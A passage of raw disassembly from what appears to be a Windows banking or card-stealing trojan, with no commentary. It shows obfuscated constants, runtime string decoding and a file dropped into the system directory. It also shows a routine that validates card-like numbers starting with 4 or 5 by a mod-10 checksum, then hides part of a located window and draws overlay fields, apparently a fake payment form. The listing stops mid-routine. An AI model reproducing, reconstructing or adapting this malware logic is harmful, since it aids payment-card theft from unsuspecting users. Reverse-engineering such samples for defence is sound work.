loc_43F851: ; CODE XREF: sub_43F6B1+136�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43F85A: ; CODE XREF: sub_43F6B1+105�j
inc [ebp+var_8]
loc_43F85D: ; CODE XREF: sub_43F6B1+C1�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_43F777
loc_43F869: ; CODE XREF: sub_43F6B1:loc_43F759�j
lea eax, off_44C3B4
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push offset dword_44DA08
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push offset dword_44DA08
push [ebp+var_14]
push dword_44C394
call sub_44163D
add esp, 10h
mov [ebp+var_18], eax
mov ecx, dword_44C1CC
add ecx, dword_44C0EC
sub ecx, 0Ah
cmp eax, ecx
jnz short loc_43F8D9
mov eax, dword_44C394
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44C394, 0
loc_43F8D9: ; CODE XREF: sub_43F6B1+6F�j
; sub_43F6B1+214�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F6B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F8DE proc near ; CODE XREF: sub_43CF47+327�p
; sub_43CF47+3B2�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_44185A
push offset byte_44D09B
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_446020
push offset byte_44D093
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
add esp, 24h
push 0
push 80h
push 4
push 0
movsx eax, word_44C0D0
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44B788 ; CreateFileA
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44BB9C ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43F98F: ; CODE XREF: sub_43F8DE+B6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F98F
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call ds:dword_44BB8C ; WriteFile
push edi
call ds:dword_44A654 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_43F8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F9B8 proc near ; DATA XREF: sub_43BB7B+9B�o
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp+var_210]
push eax
push offset dword_4480F0
call sub_44247F
add esp, 8
mov [ebp+var_208], eax
test eax, eax
jnz short loc_43F9E9
xor eax, eax
jmp loc_43FB86
; ---------------------------------------------------------------------------
loc_43F9E9: ; CODE XREF: sub_43F9B8+28�j
mov eax, dword_44C0EC
add eax, dword_44C0DC
sub eax, 3
mov [ebp+var_204], eax
loc_43F9FD: ; CODE XREF: sub_43F9B8+1BA�j
mov eax, [ebp+var_204]
mov edx, [ebp+var_208]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_43FA0F: ; CODE XREF: sub_43F9B8+5C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FA0F
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0FFh
jnb short loc_43FA53
mov eax, [ebp+var_204]
movsx edx, word_44C230
add edx, dword_44C1E8
sub edx, 6
add eax, edx
add eax, [ebp+var_208]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_444F8C
loc_43FA53: ; CODE XREF: sub_43F9B8+6E�j
mov eax, dword_44C0C8
mov esi, eax
add esi, dword_44C1D4
sub esi, 2
jmp short loc_43FA8A
; ---------------------------------------------------------------------------
loc_43FA65: ; CODE XREF: sub_43F9B8+E4�j
cmp [ebp+esi+var_FF], 28h
jnz short loc_43FA77
mov [ebp+esi+var_FF], 2Bh
loc_43FA77: ; CODE XREF: sub_43F9B8+B5�j
cmp [ebp+esi+var_FF], 29h
jnz short loc_43FA89
mov [ebp+esi+var_FF], 3Dh
loc_43FA89: ; CODE XREF: sub_43F9B8+C7�j
inc esi
loc_43FA8A: ; CODE XREF: sub_43F9B8+AB�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_43FA93: ; CODE XREF: sub_43F9B8+E0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FA93
cmp esi, eax
jb short loc_43FA65
push 0FFh
lea eax, [ebp+var_1FE]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_43A348
add esp, 0Ch
mov ebx, eax
mov eax, dword_44C158
mov edi, eax
add edi, dword_44C20C
sub edi, 0Fh
jmp short loc_43FAFB
; ---------------------------------------------------------------------------
loc_43FACD: ; CODE XREF: sub_43F9B8+145�j
movsx eax, [ebp+edi+var_1FE]
mov [ebp+var_218], eax
mov eax, edi
mul edi
mov [ebp+var_21C], eax
mov eax, [ebp+var_218]
mov edx, [ebp+var_21C]
sub eax, edx
mov [ebp+edi+var_1FE], al
inc edi
loc_43FAFB: ; CODE XREF: sub_43F9B8+113�j
cmp edi, ebx
jb short loc_43FACD
mov eax, dword_44C110
add eax, dword_44C094
sub eax, 0Ah
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1FE]
push eax
call sub_43A4B5
add esp, 0Ch
mov [ebp+var_214], eax
mov eax, dword_44C140
add eax, 0FFF6h
cmp [ebp+var_214], eax
jz short loc_43FB49
push [ebp+var_208]
call ds:dword_44861C ; LocalFree
xor eax, eax
inc eax
jmp short loc_43FB86
; ---------------------------------------------------------------------------
loc_43FB49: ; CODE XREF: sub_43F9B8+17E�j
mov eax, [ebp+var_20C]
mov edx, dword_44C274
add edx, dword_44C0A8
sub edx, 2
add eax, edx
add [ebp+var_204], eax
mov eax, [ebp+var_210]
cmp [ebp+var_204], eax
jb loc_43F9FD
push [ebp+var_208]
call ds:dword_44861C ; LocalFree
xor eax, eax
loc_43FB86: ; CODE XREF: sub_43F9B8+2C�j
; sub_43F9B8+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F9B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FB8B proc near ; CODE XREF: sub_43A58C+BA9�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_440BBA
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_43FBB2
cmp al, 35h
jnz loc_440BBA
loc_43FBB2: ; CODE XREF: sub_43FB8B+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43FBBA: ; CODE XREF: sub_43FB8B+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FBBA
mov [ebp+var_128], eax
mov edx, dword_44C1AC
add edx, 0Bh
cmp eax, edx
jz short loc_43FBE6
movsx edx, word_44C118
add edx, 10h
cmp eax, edx
jnz loc_440BBA
loc_43FBE6: ; CODE XREF: sub_43FB8B+47�j
mov ebx, dword_44C254
sub ebx, 9
jmp short loc_43FC15
; ---------------------------------------------------------------------------
loc_43FBF1: ; CODE XREF: sub_43FB8B+94�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:dword_449370[edx], eax
jz loc_440BBA
inc ebx
loc_43FC15: ; CODE XREF: sub_43FB8B+64�j
mov eax, dword_44C138
add eax, 64h
cmp ebx, eax
jb short loc_43FBF1
mov eax, dword_44C234
add eax, 0Fh
cmp [ebp+var_128], eax
jnz loc_43FE00
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_43FC47
cmp al, 20h
jnz loc_440BBA
loc_43FC47: ; CODE XREF: sub_43FB8B+B2�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_43FC59
cmp al, 20h
jnz loc_440BBA
loc_43FC59: ; CODE XREF: sub_43FB8B+C4�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_43FC6B
cmp al, 20h
jnz loc_440BBA
loc_43FC6B: ; CODE XREF: sub_43FB8B+D6�j
mov eax, dword_44C1AC
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, dword_44C270
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov byte ptr [ebp+eax+var_102], dl
mov eax, dword_44C1D4
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_FF], dl
movsx eax, word_44C100
movsx edx, word_44C174
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_106], dl
mov eax, dword_44C220
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FF], dl
mov eax, dword_44C10C
add eax, dword_44C248
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_100], dl
movsx eax, word_44C208
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_FE], dl
mov eax, dword_44C0F8
movsx edx, word_44C230
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_105], dl
mov eax, dword_44C15C
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_100], dl
movsx eax, word_44C0A4
mov edx, dword_44C0AC
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
mov eax, dword_44C154
inc eax
add eax, dword_44C1A8
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
movsx eax, word_44C24C
mov edx, dword_44C18C
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, dword_44C0DC
add eax, 6
movsx edx, word_44C1F0
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FF], dl
movsx eax, word_44C260
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F4], dl
movsx eax, word_44C230
movsx edx, word_44C16C
lea eax, [eax+edx+7]
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44C094
add eax, 4
add eax, dword_44C17C
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44C19C
mov edx, dword_44C0D4
sub edx, 6
mov [ebp+eax+var_F5], dl
jmp short loc_43FE0F
; ---------------------------------------------------------------------------
loc_43FE00: ; CODE XREF: sub_43FB8B+A4�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_444F8C
loc_43FE0F: ; CODE XREF: sub_43FB8B+273�j
mov eax, dword_44C158
mov esi, eax
add esi, dword_44C25C
sub esi, 11h
jmp short loc_43FE36
; ---------------------------------------------------------------------------
loc_43FE21: ; CODE XREF: sub_43FB8B+2B9�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_43FE30
cmp al, 39h
jle short loc_43FE35
loc_43FE30: ; CODE XREF: sub_43FB8B+29F�j
jmp loc_440BBA
; ---------------------------------------------------------------------------
loc_43FE35: ; CODE XREF: sub_43FB8B+2A3�j
inc esi
loc_43FE36: ; CODE XREF: sub_43FB8B+294�j
mov eax, dword_44C20C
inc eax
add eax, dword_44C214
cmp esi, eax
jb short loc_43FE21
mov eax, dword_44C210
add eax, dword_44C1A8
sub eax, 3
mov [ebp-108h], eax
mov eax, dword_44C1AC
movsx edx, word_44C180
mov esi, eax
add esi, edx
sub esi, 9
jmp short loc_43FEBA
; ---------------------------------------------------------------------------
loc_43FE6F: ; CODE XREF: sub_43FB8B+339�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word_44C100
movsx ecx, word_44C104
add edx, ecx
sub edx, 9
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_43FEB0
movsx eax, word_44C250
add eax, 8
sub [ebp-108h], eax
loc_43FEB0: ; CODE XREF: sub_43FB8B+313�j
mov eax, dword_44C1B8
sub eax, 3
add esi, eax
loc_43FEBA: ; CODE XREF: sub_43FB8B+2E2�j
mov eax, dword_44C268
add eax, 0Ch
cmp esi, eax
jb short loc_43FE6F
mov eax, dword_44C120
mov ebx, eax
add ebx, dword_44C15C
sub ebx, 0Dh
jmp short loc_43FEF6
; ---------------------------------------------------------------------------
loc_43FED8: ; CODE XREF: sub_43FB8B+375�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
mov eax, dword_44C190
add eax, dword_44C18C
add ebx, eax
loc_43FEF6: ; CODE XREF: sub_43FB8B+34B�j
mov eax, dword_44C094
add eax, 0Ah
cmp ebx, eax
jb short loc_43FED8
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word_44C1A4
add edi, dword_44C11C
sub edi, 0Ch
cmp edx, edi
jnz loc_440BBA
lea eax, [ebp+var_FF]
push eax
call ds:dword_44B774
pop ecx
or eax, eax
jnz loc_440BBA
mov esi, dword_44C1F8
sub esi, 3
mov eax, dword_44C1D0
mov esi, eax
add esi, dword_44C284
sub esi, 10h
jmp short loc_43FF72
; ---------------------------------------------------------------------------
loc_43FF5A: ; CODE XREF: sub_43FB8B+3F7�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp ds:dword_449370[eax], 0
jz short loc_43FF84
inc esi
loc_43FF72: ; CODE XREF: sub_43FB8B+3CD�j
mov eax, dword_44C220
add eax, 5Eh
add eax, dword_44C1D4
cmp esi, eax
jb short loc_43FF5A
loc_43FF84: ; CODE XREF: sub_43FB8B+3E4�j
mov eax, dword_44C0AC
add eax, 63h
cmp esi, eax
jz loc_440BBA
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:dword_449370[edx], eax
push offset byte_44D081
call sub_43E507
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call ds:dword_44B63C ; FindWindowExA
mov [ebp+var_134], eax
test eax, eax
jnz short loc_43FFDD
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_43FFDD: ; CODE XREF: sub_43FB8B+447�j
push offset asc_44D074 ; "\t"
call sub_43E507
push eax
push [ebp+var_134]
call sub_4416E3
mov [ebp+var_12C], eax
push offset asc_44D068 ; "\b"
loc_43FFFE: ; DATA XREF: .data:off_44D279�o
call sub_43E507
push eax
push [ebp+var_12C]
call sub_4416E3
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:dword_449374[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push ds:dword_449374[eax]
call ds:dword_44B65C ; ShowWindow
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call ds:dword_44B654 ; GetWindowRect
push 0
call ds:dword_4485E8 ; GetModuleHandleA
mov [ebp+var_10C], eax
push offset word_44D05E
call sub_43E507
add esp, 1Ch
push 0
push [ebp+var_10C]
push 0
push [ebp+var_12C]
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, dword_44C1F8
sub edi, 3
push edi
movsx edi, word_44C178
sub edi, 4
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:dword_449378[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word_44C240
mov edx, dword_44C0F0
lea ebx, [ebx+edx+0F7h]
sub edi, ebx
mov ebx, dword_44C248
add ebx, 37h
add ebx, dword_44C200
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, dword_44C0B4
movsx edx, word_44C1E0
add eax, edx
sub eax, 0Bh
cmp [ebp+var_124], eax
jge short loc_44014D
mov eax, dword_44C128
sub eax, 8
mov [ebp+var_124], eax
loc_44014D: ; CODE XREF: sub_43FB8B+5B2�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word_44C1A4
movsx ecx, word_44C180
lea edx, [edx+ecx+22h]
sub eax, edx
mov [ebp+var_120], eax
push offset dword_44D054
call sub_43E507
mov [ebp+var_278], eax
push offset byte_44D03B
call sub_43E507
mov [ebp+var_27C], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push ds:dword_449378[edi]
movsx edi, word_44C230
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word_44C0BC
mov ebx, dword_44C1CC
lea edi, [edi+ebx+5]
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, dword_44C1D4
add edi, dword_44C21C
sub edi, 0Ah
push edi
call ds:dword_44A64C ; CreateWindowExA
mov [ebp+var_138], eax
push offset byte_44D031
call sub_43E507
mov [ebp+var_284], eax
push offset byte_44D02D
call sub_43E507
mov [ebp+var_288], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push ds:dword_449378[edi]
movsx edi, word_44C24C
mov ebx, dword_44C1D0
lea edi, [edi+ebx+0EAh]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, dword_44C108
add ebx, 36h
add edi, ebx
mov ebx, dword_44C0D4
movsx edx, word_44C178
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, dword_44C0EC
add edi, 10h
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, dword_44C210
dec edi
push edi
call ds:dword_44A64C ; CreateWindowExA
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44C0B8
sub eax, 3
push eax
mov eax, dword_44C1EC
add eax, dword_44C1B8
sub eax, 0Dh
push eax
movsx eax, word_44C22C
movsx edx, word_44C1E0
add eax, edx
sub eax, 0Ah
push eax
push 2BCh
mov eax, dword_44C20C
sub eax, 6
push eax
mov eax, dword_44C0F0
dec eax
push eax
mov eax, dword_44C0E4
dec eax
push eax
mov eax, dword_44C204
add eax, 0Dh
add eax, dword_44C19C
push eax
call ds:dword_449250 ; CreateFontA
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call ds:dword_446014 ; SendMessageA
push offset byte_44D023
call sub_43E507
mov [ebp+var_290], eax
push offset word_44D01E
call sub_43E507
add esp, 18h
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
movsx edi, word_44C240
add edi, 0F8h
mov ebx, dword_44C204
movsx edx, word_44C124
add ebx, edx
sub ebx, 3
sub edi, ebx
push edi
mov edi, [ebp+var_120]
mov ebx, dword_44C1CC
sub ebx, 2
sub edi, ebx
push edi
movsx edi, word_44C16C
movsx ebx, word_44C150
add edi, ebx
sub edi, 8
push edi
movsx edi, word_44C1C0
movsx ebx, word_44C0C0
add edi, ebx
sub edi, 5
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, dword_44C0E4
add edi, dword_44C268
sub edi, 0Dh
push edi
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:dword_44937C[ebx], edi
mov eax, dword_44C0E4
cmp [ebp+eax+var_108], 34h
jnz short loc_44042A
push offset word_44D016
call sub_43E507
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_444F8C
jmp short loc_440442
; ---------------------------------------------------------------------------
loc_44042A: ; CODE XREF: sub_43FB8B+883�j
push offset aM_0 ; "\nM"
call sub_43E507
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_444F8C
loc_440442: ; CODE XREF: sub_43FB8B+89D�j
push offset word_44CF96
call sub_43E507
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call ds:dword_44B634
push offset dword_44CF8C
call sub_43E507
mov [ebp+var_298], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push ds:dword_44937C[edi]
mov edi, dword_44C164
add edi, 2Ch
push edi
push [ebp+var_120]
mov edi, dword_44C1E4
add edi, 6
push edi
mov edi, dword_44C244
movsx ebx, word_44C0B0
add edi, ebx
dec edi
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, dword_44C188
add edi, dword_44C090
sub edi, 3
push edi
call ds:dword_44A64C ; CreateWindowExA
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44C19C
sub eax, 6
push eax
mov eax, dword_44C158
sub eax, 9
push eax
movsx eax, word_44C0D0
sub eax, 7
push eax
push 190h
movsx eax, word_44C208
add eax, dword_44C120
sub eax, 0Ah
push eax
mov eax, dword_44C1AC
add eax, dword_44C23C
sub eax, 0Ah
push eax
mov eax, dword_44C1D0
add eax, dword_44C0AC
sub eax, 2
push eax
mov eax, dword_44C220
add eax, 0Ch
push eax
call ds:dword_449250 ; CreateFontA
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call ds:dword_446014 ; SendMessageA
push offset dword_44CF80
call sub_43E507
mov [ebp+var_2A0], eax
push offset dword_44CF7C
call sub_43E507
mov [ebp+var_2A4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push ds:dword_44937C[edi]
mov edi, dword_44C200
add edi, 11Fh
add edi, dword_44C1EC
push edi
mov edi, dword_44C1B8
add edi, 2Dh
push edi
mov edi, dword_44C0F0
add edi, 45h
movsx ebx, word_44C208
add edi, ebx
push edi
movsx edi, word_44C118
add edi, dword_44C254
sub edi, 2
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, dword_44C168
add edi, dword_44C12C
sub edi, 8
push edi
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:dword_449380[ebx], edi
push offset dword_44CF70
call sub_43E507
mov [ebp+var_2B0], eax
push offset dword_44CF6C
call sub_43E507
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push ds:dword_44937C[edi]
mov edi, dword_44C1B0
add edi, 125h
push edi
mov edi, dword_44C1AC
add edi, 34h
add edi, dword_44C1A0
push edi
mov edi, dword_44C25C
add edi, 41h
add edi, dword_44C1D4
push edi
mov edi, dword_44C120
lea edi, [edi+edi+3Ch]
push edi
push 50800003h
mov edi, [ebp+var_2B4]
push edi
mov edi, [ebp+var_2B0]
push edi
movsx edi, word_44C0E0
add edi, dword_44C108
sub edi, 7
push edi
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:dword_449384[ebx], edi
movsx eax, word_44C0E8
add eax, dword_44C1F8
sub eax, 3
mov [ebp+var_102], ax
jmp loc_4407D6
; ---------------------------------------------------------------------------
loc_440710: ; CODE XREF: sub_43FB8B+C5E�j
push offset dword_44CF64
call sub_43E507
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_44B634
lea eax, [ebp+var_2C6]
push eax
movsx eax, word_44C208
movsx edx, word_44C124
add eax, edx
sub eax, 0Bh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push ds:dword_449380[eax]
call ds:dword_446014 ; SendMessageA
push offset word_44CF5A
call sub_43E507
movzx edi, [ebp+var_102]
movsx ebx, word_44C0E0
lea edi, [edi+ebx+5]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_44B634
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word_44C0A4
add eax, dword_44C134
sub eax, 0Eh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_449384[eax]
call ds:dword_446014 ; SendMessageA
inc [ebp+var_102]
loc_4407D6: ; CODE XREF: sub_43FB8B+B80�j
movzx eax, [ebp+var_102]
movsx edx, word_44C208
add edx, 8
cmp eax, edx
jl loc_440710
push offset word_44CF52
call sub_43E507
mov [ebp+var_2C0], eax
push offset word_44CF4E
call sub_43E507
mov [ebp+var_2C4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push ds:dword_44937C[edi]
mov edi, dword_44C204
add edi, 17h
push edi
movsx edi, word_44C0BC
mov ebx, dword_44C1D8
lea edi, [edi+ebx+43h]
push edi
mov edi, dword_44C1EC
add edi, 74h
push edi
mov edi, dword_44C1F4
add edi, 2Bh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call ds:dword_44A64C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:dword_449388[ebx], edi
mov eax, dword_44C1D4
sub eax, 2
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_449388[eax]
call ds:dword_446014 ; SendMessageA
push offset dword_44CF44
call sub_43E507
mov [ebp+var_2D4], eax
push offset word_44CF22
call sub_43E507
mov [ebp+var_2D8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push ds:dword_44937C[edi]
movsx edi, word_44C27C
add edi, 3Ch
push edi
push [ebp+var_120]
movsx edi, word_44C100
add edi, 4Ch
push edi
movsx edi, word_44C0C0
add edi, 94h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
movsx edi, word_44C1E0
